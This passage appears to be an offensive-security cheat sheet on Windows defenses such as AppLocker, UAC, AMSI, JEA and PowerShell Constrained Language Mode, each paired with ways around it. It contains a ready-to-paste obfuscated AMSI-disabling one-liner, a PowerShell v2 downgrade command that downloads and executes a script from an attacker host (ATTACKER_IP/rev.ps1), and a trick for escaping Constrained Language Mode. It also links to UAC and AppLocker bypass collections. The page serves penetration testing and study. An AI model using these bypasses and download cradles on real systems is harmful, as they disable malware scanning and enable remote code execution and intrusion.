# Windows - Defenses ## Summary * [AppLocker](#applocker) * [User Account Control](#user-account-control) * [DPAPI](#dpapi) * [Powershell](#powershell) * [Anti Malware Scan Interface](#anti-malware-scan-interface) * [Just Enough Administration](#just-enough-administration) * [Contrained Language Mode](#constrained-language-mode) * [Script Block Logging](#script-block-logging) * [Protected Process Light](#protected-process-light) * [Credential Guard](#credential-guard) * [Event Tracing for Windows](#event-tracing-for-windows) * [Windows Defender Antivirus](#windows-defender-antivirus) * [Windows Defender Application Control](#windows-defender-application-control) * [Windows Defender Firewall](#windows-defender-firewall) * [Windows Information Protection](#windows-information-protection) ## AppLocker > AppLocker is a security feature in Microsoft Windows that provides administrators with the ability to control which applications and files users are allowed to run on their systems. The rules can be based on various criteria, such as the file path, file publisher, or file hash, and can be applied to specific users or groups. * Enumerate Local AppLocker Effective Policy ```powershell PowerView PS C:\> Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections PowerView PS C:\> Get-AppLockerPolicy -effective -xml Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe # (Keys: Appx, Dll, Exe, Msi and Script ``` * AppLocker Bypass * By default, `C:\Windows` is not blocked, and `C:\Windows\Tasks` is writtable by any users * [api0cradle/UltimateAppLockerByPassList/Generic-AppLockerbypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md) * [api0cradle/UltimateAppLockerByPassList/VerifiedAppLockerBypasses.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/VerifiedAppLockerBypasses.md) * [api0cradle/UltimateAppLockerByPassList/DLL-Execution.md](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/DLL-Execution.md) ## User Account Control UAC stands for User Account Control. It is a security feature introduced by Microsoft in Windows Vista and is present in all subsequent versions of the Windows operating system. UAC helps mitigate the impact of malware and helps protect users by asking for permission or an administrator's password before allowing changes to be made to the system that could potentially affect all users of the computer. * Check if UAC is enabled ```ps1 REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLUA ``` * Check UAC level ``` REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v ConsentPromptBehaviorAdmin REG QUERY HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System\ /v FilterAdministratorToken ``` | EnableLUA | LocalAccountTokenFilterPolicy | FilterAdministratorToken | Description | |---|---|---|---| | 0 | / | / | No UAC | | 1 | 1 | / | No UAC | | 1 | 0 | 0 | No UAC for RID 500 | | 1 | 0 | 1 | UAC for Everyone | * UAC Bypass * [AutoElevated binary signed by Microsoft](https://www.elastic.co/guide/en/security/current/bypass-uac-via-sdclt.html) - `msconfig`, `sdclt.exe`, `eventvwr.exe`, etc * [hfiref0x/UACME](https://github.com/hfiref0x/UACME) - Defeating Windows User Account Control ## DPAPI Refer to [PayloadsAllTheThings/Windows - DPAPI.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20DPAPI.md) ## Powershell ### Anti Malware Scan Interface > The Anti-Malware Scan Interface (AMSI) is a Windows API (Application Programming Interface) that provides a unified interface for applications and services to integrate with any anti-malware product installed on a system. The API allows anti-malware solutions to scan files and scripts at runtime, and provides a means for applications to request a scan of specific content. Find more AMSI bypass: [Windows - AMSI Bypass.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20AMSI%20Bypass.md) ```powershell PS C:\> [Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('am'+'siInitFailed','NonPu'+'blic,Static').SetValue($null,$true) ``` ### Just Enough Administration > Just-Enough-Administration (JEA) is a feature in Microsoft Windows Server that allows administrators to delegate specific administrative tasks to non-administrative users. JEA provides a secure and controlled way to grant limited, just-enough access to systems, while ensuring that the user cannot perform unintended actions or access sensitive information. Breaking out if JEA: * List available cmdlets: `command` * Look for non-default cmdlets: ```ps1 Set-PSSessionConfiguration Start-Process New-Service Add-Computer ``` ### Constrained Language Mode Check if we are in a constrained mode: `$ExecutionContext.SessionState.LanguageMode` * Bypass using an old Powershell. Powershell v2 doesn't support CLM. ```ps1 powershell.exe -version 2 powershell.exe -version 2 -ExecutionPolicy bypass powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')" ``` * Bypass when `__PSLockDownPolicy` is used. Just put "System32" somewhere in the path. ```ps1 # Enable CLM from the environment [Environment]::SetEnvironmentVariable('__PSLockdownPolicy', '4', 'Machine') Get-ChildItem -Path Env: # Create a check-mode.ps1 containing your "evil" powershell commands $mode = $ExecutionContext.SessionState.LanguageMode write-host $mode # Simple bypass, execute inside a System32 folder PS C:\> C:\Users\Public\check-mode.ps1 ConstrainedLanguage PS C:\> C:\Users\Public\System32\check-mode.ps1 FullLanguagge ``` * Bypass using COM: [xpn/COM_to_registry.ps1](https://gist.githubusercontent.com/xpn/1e9e879fab3e9ebfd236f5e4fdcfb7f1/raw/ceb39a9d5b0402f98e8d3d9723b0bd19a84ac23e/COM_to_registry.ps1) * Bypass using your own Powershell DLL: [p3nt4/PowerShdll](https://github.com/p3nt4/PowerShdll) & [iomoath/PowerShx](https://github.com/iomoath/PowerShx) ```ps1 rundll32 PowerShdll,main